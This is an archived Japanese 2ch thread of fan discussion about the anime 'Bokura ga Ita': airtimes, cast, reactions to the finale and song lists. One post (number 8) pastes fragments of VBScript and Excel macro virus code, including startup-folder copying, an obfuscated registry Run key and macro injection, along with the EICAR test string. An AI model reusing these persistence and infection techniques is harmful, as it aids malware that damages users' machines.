5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

僕等がいた 5

1 :名無しさん@お腹いっぱい。:2007/01/04(木) 03:01:15 ID:boaBpBJC
あのころの僕等は まだ 永遠があると信じていた

KBS 月 26:00-26:30 7/3〜
GBS 火 24:15-24:45 7/4〜
MX 水 18:30-19:00  7/5〜
CTC 木 26:25-26:55 7/6〜
TVS 金 26:00-26:30 7/7〜
HBC 金 27:20-27:50 7/7〜
TeNY 月 15:52-16:21 7/24〜
キッズステーション 土 21:00-21:30 7/15〜

■公式サイト
http://www.bokuragaita.com/index.html

■前スレ
僕等がいた 4
http://anime.2ch.net/test/read.cgi/anime/1161898268/

2 :名無しさん@お腹いっぱい。:2007/01/04(木) 03:04:17 ID:boaBpBJC
■スタッフ
原作 小畑友紀 「ベツコミ」(小学館刊)連載中
監督 大地丙太郎
脚本 池田眞美子/小川みづき/山田由香
チーフディレクター そ〜とめこういちろう
キャラクターデザイン 白井伸明
音楽 安部純/武藤星児
音響監督 たなかかずや
制作 アートランド

■キャスト
高橋七美 ささきのぞみ
矢野元晴 矢崎広
竹内匡史 川久保拓司
山本有里 中山恵里奈
水ちん  清水香里
タカちゃん 寺崎裕香
山本奈々 ゆりん

3 :名無しさん@お腹いっぱい。:2007/01/04(木) 03:07:19 ID:boaBpBJC
■過去スレ
僕等がいた(アニメ新作情報)
http://anime.2ch.net/test/read.cgi/anime3/1144938530/
僕等がいた
http://anime.2ch.net/test/read.cgi/anime/1151659315/
僕等がいた 3
http://anime.2ch.net/test/read.cgi/anime/1157195090/
僕等がいた 4
http://anime.2ch.net/test/read.cgi/anime/1161898268/

■アンチスレ
最近の大地丙太郎は駄目だ
http://anime.2ch.net/test/read.cgi/iga/1130936879/
僕等がいたに失望する僕等がいた
http://anime.2ch.net/test/read.cgi/anime/1151993480/

4 :名無しさん@お腹いっぱい。:2007/01/04(木) 03:08:54 ID:boaBpBJC
■原作関連

●掲載誌公式
http://www.betsucomi.shogakukan.co.jp/

●原作者スレ
■小畑友紀9〜僕等がいた■
http://comic7.2ch.net/test/read.cgi/gcomic/1166369864/

5 :名無しさん@お腹いっぱい。:2007/01/04(木) 07:02:07 ID:aH8iyYy5
黄身だけを〜♪

6 :名無しさん@お腹いっぱい。:2007/01/05(金) 03:28:17 ID:RuBXjAGw
どっちにしてもレス付かず消えそうな気が

7 :名無しさん@お腹いっぱい。:2007/01/05(金) 07:38:19 ID:b8813gmL
面白かったけど、あまり語り合うネタがないというか…

8 :名無しさん@お腹いっぱい。:2007/01/05(金) 14:00:31 ID:x4w+6mYg
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :名無しさん@お腹いっぱい。:2007/01/05(金) 21:54:33 ID:jCnzUZv+
このアニメってあっち系?

10 :名無しさん@お腹いっぱい。:2007/01/05(金) 23:54:57 ID:bzUvKBaQ
うん

11 :名無しさん@お腹いっぱい。:2007/01/06(土) 00:59:19 ID:IU3ApW8L
放送時間が夕方から深夜にいきなりなったなぜだろう

12 :名無しさん@お腹いっぱい。:2007/01/06(土) 02:27:03 ID:EyCTgWWB
>11
新潟?

13 :名無しさん@お腹いっぱい。:2007/01/06(土) 02:52:45 ID:IU3ApW8L
そう

14 :名無しさん@お腹いっぱい。:2007/01/06(土) 03:06:25 ID:IU3ApW8L
あの時間帯にやるアニメじゃないもんなきっとPTAからくじょうがきたんだよな

15 :名無しさん@お腹いっぱい。:2007/01/06(土) 04:04:40 ID:au39gv/x
見終わった。泣いた。最後の追いかけるところなんてたまんないよな・・・

16 :名無しさん@お腹いっぱい。:2007/01/06(土) 04:08:32 ID:pV+UDtcP
私、大学は東京に行く。

欲 し い 物 が あ る か ら

17 :名無しさん@お腹いっぱい。:2007/01/06(土) 08:45:14 ID:upIVBu56
最初のほう(8話くらいまで)しか観てないのに、たまたま昨日最終話観て

泣けた。ナニコレ

18 :名無しさん@お腹いっぱい。:2007/01/06(土) 13:23:15 ID:4xinhVQA
このアニメより、PTAの連中の方が子供にとっては有害だけどな

19 :名無しさん@お腹いっぱい。:2007/01/06(土) 19:03:28 ID:KyoZskcX
セックルシーンあるからな

20 :名無しさん@お腹いっぱい。:2007/01/06(土) 21:28:30 ID:c5mZtKQO
キッズ終わった。
まだ最終回手前だけど・・・

泣いた泣いた泣いた泣いた泣いた!!!!!!!
号泣した!!!!!見るの2回目なのに。

21 :名無しさん@お腹いっぱい。:2007/01/06(土) 22:46:53 ID:azUwaC32
>>19
未遂くらいどこにでもあるけどな、描写もねーし
PTAはダニだな

22 :名無しさん@お腹いっぱい。:2007/01/07(日) 01:12:59 ID:2or5gFAr
>>20
自分もようつべで既に視聴済みなんだけど、今日のキッズで又泣いた。
先の展開知ってるから余計泣けるんだよぉ。ここで終わってくれたら
ネ申だったのに…作者ヒドス
(思考はそれぞれなんで、今の原作展開が好きな人は毒吐いてゴメン)

23 :名無しさん@お腹いっぱい。:2007/01/07(日) 01:45:44 ID:lB4LMehq
最終回だから見てみたら…
アリエナス…なんか韓国ドラマみたいでキモい
なんでこれ売れてるのか謎
どこが泣けるの?どこがせつないの?

24 :名無しさん@お腹いっぱい。:2007/01/07(日) 03:53:35 ID:hr1GDbfG
>>23
最終回以外見ないから、以上

25 :名無しさん@お腹いっぱい。:2007/01/07(日) 04:23:13 ID:WNFoptAY
>>23
391 名前: 花と名無しさん [sage] 投稿日: 2007/01/07(日) 01:47:44 ID:???O
どうしてこれが660万部も売れるのか理解できん…
どこが面白いの??謎…

これおまいさん?


26 :名無しさん@お腹いっぱい。:2007/01/07(日) 05:57:15 ID:lB4LMehq
最終回だけ見てドン引きしたのは自分だけじゃなかったんだな
良かった

27 :名無しさん@お腹いっぱい。:2007/01/07(日) 08:39:27 ID:mv6B8yIJ
原作は読んだ事ないけど、多分アニメと違って面白いんでしょ

28 :名無しさん@お腹いっぱい。:2007/01/07(日) 13:42:04 ID:qRXp50//
全部見終わった。
んで、Amazonで原作1巻から注文した。

29 :名無しさん@お腹いっぱい。:2007/01/08(月) 01:18:25 ID:tdnHsHjI
大地監督のTVシリーズでこれだけオタクから相手にされなかったのも
これが初めてだろうな

30 :名無しさん@お腹いっぱい。:2007/01/08(月) 11:04:35 ID:YlwURQY8
これって視聴率はどれくらいだったの?

31 :名無しさん@お腹いっぱい。:2007/01/08(月) 19:01:42 ID:m7lsz9YP
e.muってバンドの曲がいい感じにフィットする
北海道つながりで雪とかよくでてくるから

32 :名無しさん@お腹いっぱい。:2007/01/08(月) 19:16:33 ID:xOCsHglO
>>29
e意味de

33 :名無しさん@お腹いっぱい。:2007/01/08(月) 21:30:09 ID:IYXop7qu
七美って髪型によっては絢香に似てるな

34 :名無しさん@お腹いっぱい。:2007/01/08(月) 23:45:07 ID:OYOpMF9y
>>29
一般から相手にされたのでおk

35 :名無しさん@お腹いっぱい。:2007/01/09(火) 02:48:41 ID:EKnCcIoN
>>33
あんなブスと一緒にすんな
しかし、東京行ってから顔がコロコロ変わってる

36 :名無しさん@お腹いっぱい。:2007/01/09(火) 03:22:12 ID:qdxJPYQA
ナナミの目のでかさは異常

37 :名無しさん@お腹いっぱい。:2007/01/09(火) 10:55:38 ID:Nf3PJ9EY
一般から相手にされてたとは思えないけど…

38 :名無しさん@お腹いっぱい。:2007/01/09(火) 15:50:34 ID:GdRngKDw
このアニメの中に僕等はいなかった

39 :名無しさん@お腹いっぱい。:2007/01/09(火) 16:30:31 ID:1EBGTmLE
マンガの方の最終回がどうなるのか気になる

40 :名無しさん@お腹いっぱい。:2007/01/09(火) 21:01:46 ID:rkW5p7a/
最終回だけ見てどこが面白いの?
って言ってるおめーら、テレビの1話から5話まで一気見してみ?

41 :名無しさん@お腹いっぱい。:2007/01/09(火) 21:45:43 ID:FRaV6NIt
おめーらって程、最終回だけ見た人ってのもこのスレには出て来てないが。
そもそも全部見てない奴は批判する権利はない。

42 :名無しさん@お腹いっぱい。:2007/01/10(水) 02:02:51 ID:mSnEzYUt
いや、あるだろ…
権利とか何言ってんだか

43 :名無しさん@お腹いっぱい。:2007/01/10(水) 02:31:28 ID:7NFjXr8e
全部見ないで何を言うのか。
見ている回だけで批判したとしても、見ていない回でその批判を
翻すシーンがあるかもしれないわけで。
まぁ、語るのは勝手だが、説得力はないし、単なるいちゃもんレベルにしかならない。

44 :名無しさん@お腹いっぱい。:2007/01/10(水) 03:12:15 ID:mSnEzYUt
嫌ならスルーすればー?

45 :名無しさん@お腹いっぱい。:2007/01/10(水) 03:14:46 ID:9EdhJZqV
>44
言ってることはごもっともだが
自分で言うのは頭悪そうに見えるから
やめとけ

46 :名無しさん@お腹いっぱい。:2007/01/10(水) 04:42:45 ID:EKUxQIou
ストーリーアニメの最終回だけ見て語っているって
2時間モノ劇場アニメでいうところの終盤の10分だけ見て語っているのと同じ意味合いな気がする。

47 :名無しさん@お腹いっぱい。:2007/01/10(水) 06:57:53 ID:yUnrinBT
語るのはいいけど
もったいないなーとかわいそうになる

48 :名無しさん@お腹いっぱい。:2007/01/10(水) 16:13:46 ID:leIsxgs+
普通につまらないなこれ。HDDに録画してたのを一気に消してやろうかというほどつまらん。

49 :名無しさん@お腹いっぱい。:2007/01/10(水) 17:01:33 ID:mSnEzYUt
時間無駄にしなくていいんじゃね

50 :名無しさん@お腹いっぱい。:2007/01/10(水) 17:24:21 ID:yUnrinBT
>>48
録画してんじゃねーかwww

51 :名無しさん@お腹いっぱい。:2007/01/10(水) 22:21:02 ID:asD6BLRW
いま 最終回見てるんだけどもちょっと感動的ね。
てか高橋さんの志望校のJ大学って上智さんだよね? 竹内くんは早稲田政経でしょ?
あったまいいよ。普通にいうんだもんな。
てか原作のストーリーは もちろん違いますよね?(2巻までしか読んでないんで)
初めてレスしました。


52 :名無しさん@お腹いっぱい。:2007/01/10(水) 22:34:38 ID:asD6BLRW
てか 連続で悪いんだけど、最終回はプレゼントがあるけど応募する?当たっても微妙に欲しくなくない?
だってマグカップに「僕らがいた」ってロゴとかイラストまで入ってた日にゃあ困るでしょ?どう?
みなさんはもうハガキ出しましたか?15日締切りです。

53 :名無しさん@お腹いっぱい。:2007/01/10(水) 22:56:03 ID:9M/ZAP/C
大学名とか内容とは何の関係もないがな
むしろ、そこだけ妙にリアルで浮いてた気も

54 :名無しさん@お腹いっぱい。:2007/01/11(木) 00:41:07 ID:7t5PiQjk
>>51
原作は矢野と最後に過ごす日は旅行行きます
後はだいたい同じ、たまにセリフが増えたり
あと最初のほうで首に手当てるのが消えたかな?
原作の高校後も描かれているが、みるかみないかはまかせる
個人的にはここからの展開がすごすぎて楽しめているが心が痛い

55 :名無しさん@お腹いっぱい。:2007/01/11(木) 09:25:37 ID:E2HTTjei
>>481
速攻消しても問題ないよ。
つまんないしこれ

56 :名無しさん@お腹いっぱい。:2007/01/11(木) 19:34:40 ID:CZyNwulE
>>55 そっか。でも最初のころは淡くて好きだったよ。高校の時にフられた娘と高橋ナナちゃんがかぶって かなり切ない思いをしました。
かなり最初だけだけど付合いだす前がよかった。

57 :名無しさん@お腹いっぱい。:2007/01/12(金) 05:42:43 ID:07yBUDGK
だよね。七美に対する変なイライラとかも無いし、
1年の文化祭の頃が1番良かった気がするよ。

58 :名無しさん@お腹いっぱい。:2007/01/12(金) 06:43:33 ID:jEY3Q77N
しかしサントラは欲しいと思う

59 :名無しさん@お腹いっぱい。:2007/01/12(金) 08:22:52 ID:ZPkyiZxF
サントラに歌全部入るといいな
別にでそうか、ヴォーカルコレクションみたいな感じで
Miの曲とか探すの大変

60 :名無しさん@お腹いっぱい。:2007/01/12(金) 15:12:21 ID:3BEAjS6+
で、おまえらはこれでヌけるのか

61 :名無しさん@お腹いっぱい。:2007/01/12(金) 16:34:18 ID:vALLUHEJ
倍速で視聴したのでテンポ良かった。5割り増しぐらいの速さで
放送されていれば、イライラもかなり減ったと思う。2クールは
ちょっと長いな。

62 :名無しさん@お腹いっぱい。:2007/01/12(金) 20:33:28 ID:oDx9HUVv
き〜みだけを〜 なら買ってもいい

63 :名無しさん@お腹いっぱい。:2007/01/12(金) 21:31:06 ID:ZPkyiZxF
>>62
それは入手しやすいかもな。1曲目が有名な曲なだけに

64 :名無しさん@お腹いっぱい。:2007/01/13(土) 14:43:31 ID:TXg50l6l
山本妹・・・(´;ω;`)良い奴だな・・

65 :名無しさん@お腹いっぱい。:2007/01/13(土) 21:28:23 ID:JfIIP9OE
うぐぉぉおおおうえっぐすんぐすんうひぃーん(´;ω;`)

66 :名無しさん@お腹いっぱい。:2007/01/13(土) 21:51:18 ID:WUeu28ZC
最近見てなくて曜日が変わってたことがわかんなかった…orz
TeNYは金曜の27:00からになってるなんて…

67 :名無しさん@お腹いっぱい。:2007/01/13(土) 22:53:04 ID:Ag3UVV5+
キッズオワタ・・・泣いたな。

ストーカー山芋が少しだけ怖い気がしたがネタバレ読んだせいだろう・・・・

68 :名無しさん@お腹いっぱい。:2007/01/13(土) 22:57:49 ID:Pp34mDQz
あの時間にやるアニメじゃなかったんだよ、セイザーXのあと番組だったから子供たちが混乱したんだよな子供といっしよにみていた親も子供にいろいろきかれてさぞこまったろうな

69 :名無しさん@お腹いっぱい。:2007/01/14(日) 00:44:19 ID:S+OyE8hb
そうなのか…まぁ確かに戦隊もの好きな子供には受けなさそうだな。
久々に見て面白かったよ。

70 :名無しさん@お腹いっぱい。:2007/01/14(日) 08:14:13 ID:sKh4iXdu
つーか、こんなの子供が見るのかw
大人が見ていても眠くなる

71 :名無しさん@お腹いっぱい。:2007/01/15(月) 01:14:54 ID:vw4xwkvJ
アニメだけ観てたけど、NANAより好きだな。
しかし、どう観ても賢そうに見えなかった矢野や七美が上智や早稲田政経や慶応を
普通の目指してるトップクラスの進学校の高校生だったとは。
七美は上智受かって上京すんのか。

72 :名無しさん@お腹いっぱい。:2007/01/15(月) 04:53:04 ID:MSNH+bYd
どうみてもDQNです。
本当にありがとうございました。

73 :名無しさん@お腹いっぱい。:2007/01/15(月) 18:24:04 ID:5g5offfr
挿入歌とかEDの歌のリストって無い?

74 :名無しさん@お腹いっぱい。:2007/01/15(月) 19:44:12 ID:R7NEwa2X
主人公あんな純情そうな感じなのにセックルシーンあるのか

75 :名無しさん@お腹いっぱい。:2007/01/15(月) 22:42:38 ID:IG75wyN5
>>71
単行本読めば全て解決
現実はそんな甘くないってこった

76 :名無しさん@お腹いっぱい。:2007/01/17(水) 01:54:59 ID:iIb8S4n6
>>73
来週ぐらいに出るボーカルベスト買え

77 :名無しさん@お腹いっぱい。:2007/01/17(水) 05:53:14 ID:Pyq11+oi
ボーカルベストもサントラも発売日変更になっているよ。
来月の7日って聞いたけど・・・。

78 :名無しさん@お腹いっぱい。:2007/01/17(水) 20:28:25 ID:uxcLMT7r
kidsで見たがこれ・・・面白いな

79 :名無しさん@お腹いっぱい。:2007/01/17(水) 21:38:18 ID:g6mtYCAd
原作完結したらアニメの続編やって欲しいな。
アニメの最終回、山本妹が意味深な事言って東京行き決めてたし。

80 :名無しさん@お腹いっぱい。:2007/01/17(水) 22:15:38 ID:zUd90P5Z
>>79
続き作るつもりだったとしたら、最後のフラグいれるだろ
あれがない時点で、今の人気の微妙さから続編はないと思われる

81 :名無しさん@お腹いっぱい。:2007/01/17(水) 23:54:07 ID:bb3xlf9i
>>73
オープニングテーマ:
「君だけを…」
作詞:Maika/作曲・編曲:西川進/歌:Mi

エンディングテーマ:
「アイシテル」(第1,8,10話)
作詞:Maika/作曲:Mi+T/編曲:TATSUKI+Michitaro/歌:Mi
「ここにいて」(第2,5,24話)
作詞:大地丙太郎/作曲:手塚理/編曲:武籐星児/歌:麻生かほ里
「サンセット-album version-‎」(第3,18話)
作詞:??/作曲:?/編曲:武藤星児/歌:Mi
「好きだから‎‎」(第4,6話)
作詞:大地丙太郎/作曲:安部純/編曲:武藤星児‎/歌:加藤いづみ
「ふたりの季節ガ‎‎」(第7,9,11,13話)
作詞:大地丙太郎/作曲:安部純/編曲:武藤星児‎/歌:ささきのぞみ
「美しすぎて」(第12話)
作詞:山上路夫/作曲:村井邦彦/編曲:高橋研/歌:加藤いづみ
「キミがいる」(第14話)
作詞・作曲:高橋研/編曲:武藤星児/歌:加藤いづみ
「メリーゴーラウンド」(第15,16,19,22話)
作詞:ささきのぞみ/作曲:安部 純/編曲:武藤星児/歌:ささきのぞみ
「言葉」 (第17,20,21,23,25,26話)
作詞: 高橋研/作曲 : 高橋研/編曲 : 高橋研/歌 : 加藤いづみ
「星を数えるよりも」 (第16話(挿入歌)、第18話ではスキャット)
作詞: 大津美紀/作曲 : 大津美紀/編曲 : 大津美紀/歌 : 大津美紀

82 :名無しさん@お腹いっぱい。:2007/01/18(木) 00:42:34 ID:sCHLFdDy
全話見た感想だけど、矢野のどこがいいんだ?
あんなの、その辺にいる自分勝手なDQNじゃないの?

竹内君の方が男らしいし、真面目だし、かっこいいし、
どう考えても、選ぶなら竹内君一択でしょ。

ストーリー的にそんなに悪くは無いけど、ある程度の大人が見ると、楽しめないと思う。
中学生ぐらいまでの女の子なら、ああいう悪ぶったのに憧れる時期があるから、
そういう年代向けの作品かな?

挿入歌などの音楽は全般にかなり良かった。

83 :名無しさん@お腹いっぱい。:2007/01/18(木) 00:50:37 ID:q6mRdvzm
つまり、あんたは心が汚れてしまったのさw

大人を自称するなら、もう少し客観的な視点を養えたまえ

84 :名無しさん@お腹いっぱい。:2007/01/18(木) 01:21:55 ID:sCHLFdDy
>>83
うん、客観的な視点からだと、

客観的な視点を養えたまえ→客観的な視点を養いたまえ

こうねw

85 :名無しさん@お腹いっぱい。:2007/01/18(木) 02:39:37 ID:qUyFKUpa
>>82 にやや同意
なんか思ってることを言葉にしてくれてちょっとすっきりしたよ
でもさ 竹内くんも一回 フられたら諦めるべきだとは思うけどね。



86 :名無しさん@お腹いっぱい。:2007/01/18(木) 04:35:38 ID:+/ZGwtdC
>>73
<僕等がいた/ED曲>
01話 「アイシテル」
02話 「ここにいて」
03話 「サンセット -album version-」
04話 「好きだから」
05話 「ここにいて」
06話 「好きだから」
07話 「ふたりの季節が」
08話 「アイシテル」
09話 「ふたりの季節が」
10話 「アイシテル」          挿入歌 「Milkey Way」
11話 「ふたりの季節が」
12話 「美しすぎて」          挿入歌 「ふたりの季節が」 「サンセット album version」
13話 「ふたりの季節が」       挿入歌 「青空」
14話 「キミがいる」
15話 「メリーゴーラウンド」
16話 「メリーゴーラウンド」      挿入歌 「好きだから」 「青空」 「星を数えるよりも」
17話 「言葉」              挿入歌 「青空」
18話 「サンセット -album version-」
19話 「メリーゴーラウンド」
20話 「言葉」
21話 「言葉」              挿入歌 「メリーゴーラウンド」
22話 「メリーゴーラウンド」      挿入歌 「ふたりの季節が」
23話 「言葉」              挿入歌 「ふたりの季節が」
24話 「ここにいて」
25話 「言葉」              挿入歌 「星を数えるよりも」
26話 「言葉」              挿入歌 「好きだから」

オープニングテーマ「君だけを…」  作詞 Maika/作曲 母里ゆみこ/歌 Mi (コロンビアミュージックE)
「アイシテル」  作詞 Maika/作曲 Mi+T/編曲 TATSUKI+Michitaro/歌 Mi (コロンビアミュージックE)
「ここにいて」  作詞 大地丙太郎/作曲 手塚理/編曲 武藤星児/歌 麻生かほ里 (マーベラスE)
「サンセット album version」 作詞 ハートハート/作曲 ハート/編曲 J/歌 Mi (コロンビアミュージックE)(2005/09)
「好きだから」     作詞 大地丙太郎/作曲 安部純/編曲 武藤星児/歌 加藤いづみ (マーベラスE)
「ふたりの季節が」  作詞 大地丙太郎/作曲 手塚理/編曲 武藤星児/歌 ささきのぞみ (マーベラスE)
「美しすぎて」  作詞 山上路夫/作曲 村井邦彦/編曲 高橋研/歌 加藤いづみ (ポーニーキャニオン)(1992/10)
「キミがいる」  作詞・作曲 高橋研/編曲 武藤星児/歌 加藤いづみ (マーベラスE)
「メリーゴーラウンド」  作詞 ささきのぞみ/作曲 安部純/編曲 武藤星児/歌 ささきのぞみ (マーベラスE)
「言葉」      作詞・作曲・編曲 高橋研/歌 加藤いづみ (マーベラスE)
挿入歌 「Milkey Way」  作詞 安原麗子/作曲 COUGEN/編曲 COUGEN/歌 安原麗子 (A & I Records)
挿入歌 「青空」      作詞・作曲・編曲 高橋研/歌 加藤いづみ (g-strings Records)
挿入歌 「星を数えるよりも」 作詞・作曲 大津美紀/編曲 大津美紀、tetsu-yeah/歌 大津美紀 (マーベラスE)

87 :名無しさん@お腹いっぱい。:2007/01/18(木) 06:34:26 ID:MvJCoj/a
>>81>>86


矢野の事より、七美のほうがあそこまでとりあうほど魅力あるのか?
そのあたりもっと表現しないとちょっときつい気はするがね
矢野を好きになるのは、あの頃の女子一般の思考としては普通なんじゃね?
それに高校時代のなんか特有の青春の香りなんかもプラスされて
プラマイプラスになっちゃったんじゃねーーの?
竹内はどうみてもイイ人。損するタイプだよ

88 :名無しさん@お腹いっぱい。:2007/01/18(木) 09:42:19 ID:M+TNixR8
作者が七美に自己投影して(設定では)カッコイイ男子に取りあわれて困るw
みたいな?
作者の自己満足妄想ぽいよね

89 :名無しさん@お腹いっぱい。:2007/01/18(木) 19:11:16 ID:hXZTcXrq
メリーゴーラウンド良すぎるふたりの季節がも好きだったけどね

声は初めどうなるかと思ってたけど結構合ってて良かった
特に七美の声好きかも

90 :名無しさん@お腹いっぱい。:2007/01/18(木) 22:16:25 ID:MvJCoj/a
>>89
七ちゃんの声。声優的に見るとレベルは低いんだろうけど
それがまたいい感じだよな。たまんねー

91 :名無しさん@お腹いっぱい。:2007/01/18(木) 23:03:34 ID:iQLVmDqK
メリーゴーラウンド 俺も一番好きだ。

つーか、このアニメ、楽曲に力入れまくりなんだね。
改めて一覧見て驚いた。
こんなにあったのか と。
これだけ多くの歌を使ったアニメってめずらしいよね。
歌をテーマにしたアニメ(例えばマクロスとか)ならあるだろうけど。

92 :名無しさん@お腹いっぱい。:2007/01/18(木) 23:40:04 ID:BVYmDeGe
>>91
同感

皮肉な言い方だけど、ストーリーはともかく
楽曲で聴かせるいいアニメだったなと。

CDは是非買いたいと思った

93 :名無しさん@お腹いっぱい。:2007/01/18(木) 23:49:05 ID:vYcuLVgv
楽曲は大好きだけど、慣れてくると七美の声が堪らなく好き。

ところで質問なんだけど、
原作2巻の最後で「15歳の冬」って出て来るけど
矢野の誕生日が7月、七美の誕生日が9月ってことを考えると
冬の時点ではお互い16歳になってるわけなんだが…
これって、作者の設定ミス?

既出だったらスマソ。

94 :名無しさん@お腹いっぱい。:2007/01/19(金) 01:26:11 ID:n45ItMYY
>90
つか、初仕事がこれじゃなかったっけ?
ささきのぞみって

95 :名無しさん@お腹いっぱい。:2007/01/19(金) 01:55:01 ID:y0x3uDxO
>>94 そうかも。
しゃべり方がいいよね。ささきさんは日本テレビの「結界師」にも出てるよ!コナンの前の時間帯。


96 :名無しさん@お腹いっぱい。:2007/01/19(金) 05:14:38 ID:8sT20whM
ささきさんは大地が声優サークルみたいな所で発掘したんでしょ?
山本妹の中の人は十兵衛ちゃん2のフリーシャ役で大地が発掘した。
そういや挿入歌の「Milkey Way」の安原さんも出演してたね

97 :名無しさん@お腹いっぱい。:2007/01/19(金) 14:15:22 ID:wDUa0EZd
七味の声いいね。自然な感じがいい。
矢野に「死ね馬鹿!」はワロタw

98 :名無しさん@お腹いっぱい。:2007/01/19(金) 15:47:31 ID:WbaVXz6n
>>95
え!?もしかしてサブキャラの女みたいなやつか?
なんか霊が見えちゃうとかの

なんか声かわいいなーと思ってたら、またササキさんかよ!w

99 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:42:46 ID:0keL4Vwg
ED「アイシテル」はガチでいい曲
これが1話のEDじゃなかったら切ってたかもしれん

100 :名無しさん@お腹いっぱい。:2007/01/19(金) 23:32:38 ID:wDUa0EZd
100

101 :名無しさん@お腹いっぱい。:2007/01/19(金) 23:47:18 ID:IdvZge8z
>>98
ちがうし。神田百合奈のCVは和希沙也
山本姉の人だったら時音の友人役で出てるけど
川上きらら ゆりん
>>95は勘違いしてんじゃね?

102 :名無しさん@お腹いっぱい。:2007/01/20(土) 02:19:37 ID:UVqZR7g1
いまのところ、ささきのぞみの仕事は

僕等がいた(高橋七美)
ウィンターガーデン(愛子)
らき☆すた(パトリシア=マーティン)

だって。

103 :名無しさん@お腹いっぱい。:2007/01/20(土) 23:36:42 ID:iFk5Rx7T
>>99
それは俺も思った!ガチで名曲だと思う
メンバーブスじゃなくタイアップよけりゃもっと売れてるはずだよな、あのバンド
つかcwでCD作ったほうが売れそう
監督いい曲拾ったな

ヴォーカルベストに収録がまだ確定してないけど
これが入ってないなら買わん

104 :名無しさん@お腹いっぱい。:2007/01/21(日) 05:57:19 ID:d1pXiXfj
この番組ってED沢山あるんだな
ttp://ja.wikipedia.org/wiki/%E5%83%95%E7%AD%89%E3%81%8C%E3%81%84%E3%81%9F

竹内の誕生日の回のEDが気に入ったんだけど、それって何話かわかります?
CD化されてるのかな?


105 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:11:16 ID:Qb/NUb7z
>>104
たぶん、それ10話。

106 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:31:04 ID:Bhykk7Bp
いまアニメを見終わって、単行本が欲しくなったわけだが


これ少女漫画だよな?あのエリアに買いに行かないと行けないんだよな?

107 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:33:13 ID:d1pXiXfj
つAmazon
つセブンアンドワイの店頭引換え

108 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:33:58 ID:d1pXiXfj
>>105
dd
CD化されてるみたいで安心した
OPはどうも好きになれなかったが、これは好きだ

109 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:06:16 ID:jaEVbV2n
OPはベンチで寄り添うのが好き
七が尻を持ち上げて移動するとこ

110 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:36:35 ID:QRcJu92x
>>106
がんばれ

111 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:21:34 ID:nRsGO9Vv
>>106
アニメだけで満足しといたほうがいいんじゃない?

112 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:40:17 ID:/uLDnz4c
>>106
B○○k ○FF じゃあ、アノエリアになく
レジ横とかの特別目立つ売れ筋棚にあったりする。

113 :名無しさん@お腹いっぱい。:2007/01/23(火) 05:33:53 ID:R1kAreIY
七美のけつを思い切りぶっ叩き隊!

114 :名無しさん@お腹いっぱい。:2007/01/25(木) 00:27:55 ID:6nOPVF2H
タケと一回くらい寝るくらいまでいけば面白かったのになあ。

しかし、誠実な好青年と軽薄な美少年の勝負だと
勝つのは大体、後者だねえ。


28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)